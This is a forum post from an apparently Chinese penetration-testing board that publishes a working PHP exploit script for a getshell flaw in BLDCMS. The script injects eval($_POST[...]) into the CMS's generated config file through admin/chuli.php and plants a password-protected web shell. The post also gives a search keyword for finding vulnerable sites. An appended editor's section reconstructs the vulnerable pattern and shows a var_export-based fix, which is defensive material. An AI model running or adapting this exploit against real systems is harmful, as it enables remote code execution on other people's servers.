中国网络渗透测试联盟
Title: BLDCMS (白老大小说) Getshell 0day EXP
Author: admin
Time: 2013-3-26 20:49
A while back I wanted to get into a blackhat's site and noticed that a neighbouring site on the same server was running BLDCMS, so I downloaded it and had a look... and found a getshell vulnerability.

Last night 晴天小铸 noticed that someone on 90sec had already published an analysis of this getshell vulnerability. Damn, beaten to it.

Since it is out anyway, I'll release the EXP I wrote earlier.
<?php
echo "---------------------------------------------------------------------\r\n"
   . " BLDCMS (白老大 PHP novel scraper) GETSHELL 0DAY EXP  (requires GPC=Off)\r\n"
   . " Vulnerability discovery & code by 数据流@wooyun   QQ:981009941   2013.3.21\r\n"
   . " Usage: php.exe EXP.php www.baidu.com /cms/ pass   (pass = one-line shell password)\r\n"
   . " Search keyword: \"开发者: 白老大小说\"\r\n"
   . "---------------------------------------------------------------------\r\n";

if ($argc < 4) {
    exit("Usage: php EXP.php <host> <cms path> <shell password>\r\n");
}
$host = $argv[1];              // target host name, no scheme
$dir  = rtrim($argv[2], '/');  // web path of the CMS, e.g. /cms
$pass = $argv[3];              // $_POST key of the one-line shell

// Close the single-quoted string the CMS writes into its config file,
// append an eval() of our POST parameter, and re-open the string so the
// generated PHP stays syntactically valid: ';eval($_POST["pass"]);'
// Sent raw: with magic_quotes_gpc=On the quotes would be escaped and the
// injection would fail, hence the GPC=Off requirement.
$eval = '\';eval($_POST["' . $pass . '"]);\'';

// Form fields accepted by admin/chuli.php?action=a_1; the injection is in "sqlite".
$postData = 'sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite=' . $eval;

function getshell($host, $dir, $pass, $postData)
{
    // Hand-built HTTP/1.1 request over a raw socket (port 80, 15 s timeout).
    $request  = "POST $dir/admin/chuli.php?action=a_1 HTTP/1.1\r\n";
    $request .= "Host: $host\r\n";
    $request .= "User-Agent: MSIE\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "Content-Length: " . strlen($postData) . "\r\n";
    $request .= "Connection: Close\r\n";
    $request .= "\r\n";
    $request .= $postData;

    $fp = fsockopen($host, 80, $errno, $errstr, 15);
    if (!$fp) {
        exit("Exploit failed: check that the target is reachable ($errno $errstr)\r\n");
    }
    if (!fputs($fp, $request)) {
        exit("Exploit failed: could not send the request\r\n");
    }

    // Drain the response so the server finishes processing before we close.
    $response = '';
    while (!feof($fp)) {
        $response .= @fgets($fp, 1000);
    }
    @fclose($fp);

    echo "Shell: http://$host$dir/conn/config/normal2.php   password: $pass\r\n";
    echo "(if the connection fails, check whether the target has GPC=Off)\r\n";
}

getshell($host, $dir, $pass, $postData);
?>
by 数据流
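Added by the editor, not part of 数据流's post and not BLDCMS code: a PHP sketch of the bug class the EXP abuses. The real handler behind admin/chuli.php is not on this page, so build_config_unsafe() below is an assumed reconstruction of its pattern (POST fields interpolated straight into PHP source and written out as conn/config/normal2.php), inferred only from the shape of the payload, ';eval(...);'. The field names are the ones the EXP sends. Beside it is the fix a maintainer would apply: whitelist the keys and emit every value with var_export(), so a quote in the input can never close the string literal. token_get_all() is then used to show that the page's own payload produces a live eval token from the unsafe writer and nothing but a string literal from the safe one.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (NOT BLDCMS source):
// request values are dropped into PHP source text unescaped.
function build_config_unsafe(array $fields): string
{
    $src = "<?php\n";
    foreach ($fields as $name => $value) {
        $src .= "\$config['$name'] = '$value';\n";
    }
    return $src;
}

// Hardened writer: fixed key list, only short strings accepted, and
// var_export() produces a correctly quoted PHP literal for each value.
function build_config_safe(array $fields): string
{
    static $allowed = ['sitename', 'qq', 'getcontent', 'tongji', 'cmsmd5', 'sqlite'];
    $src = "<?php\n";
    foreach ($allowed as $name) {
        $value = $fields[$name] ?? '';
        if (!is_string($value) || strlen($value) > 255) {
            throw new InvalidArgumentException("bad value for $name");
        }
        $src .= '$config[' . var_export($name, true) . '] = '
              . var_export($value, true) . ";\n";
    }
    return $src;
}

// True if the generated source contains an eval keyword outside a string.
function contains_eval(string $src): bool
{
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok) && $tok[0] === T_EVAL) {
            return true;
        }
    }
    return false;
}

// Constructed input: the exact sqlite payload the EXP sends with GPC off.
$pass    = 'pass';
$payload = '\';eval($_POST["' . $pass . '"]);\'';
$fields  = ['sitename' => 'a', 'qq' => '1', 'getcontent' => 'acurl',
            'tongji' => 'a', 'cmsmd5' => '1', 'sqlite' => $payload];

$unsafe = build_config_unsafe($fields);
$safe   = build_config_safe($fields);

echo $unsafe, "\n";   // the sqlite line closes its quote and calls eval()
echo $safe, "\n";     // the payload is an inert, escaped string literal
var_dump(contains_eval($unsafe));
var_dump(contains_eval($safe));
```

Run it with php from the command line; the two var_dump() lines are the check. Note that var_export() is the right tool because it emits a parseable PHP literal, whereas addslashes() only helps for single-quoted context and still leaves the writer depending on magic_quotes-style escaping, which is exactly what the EXP's GPC=Off condition sidesteps.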
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2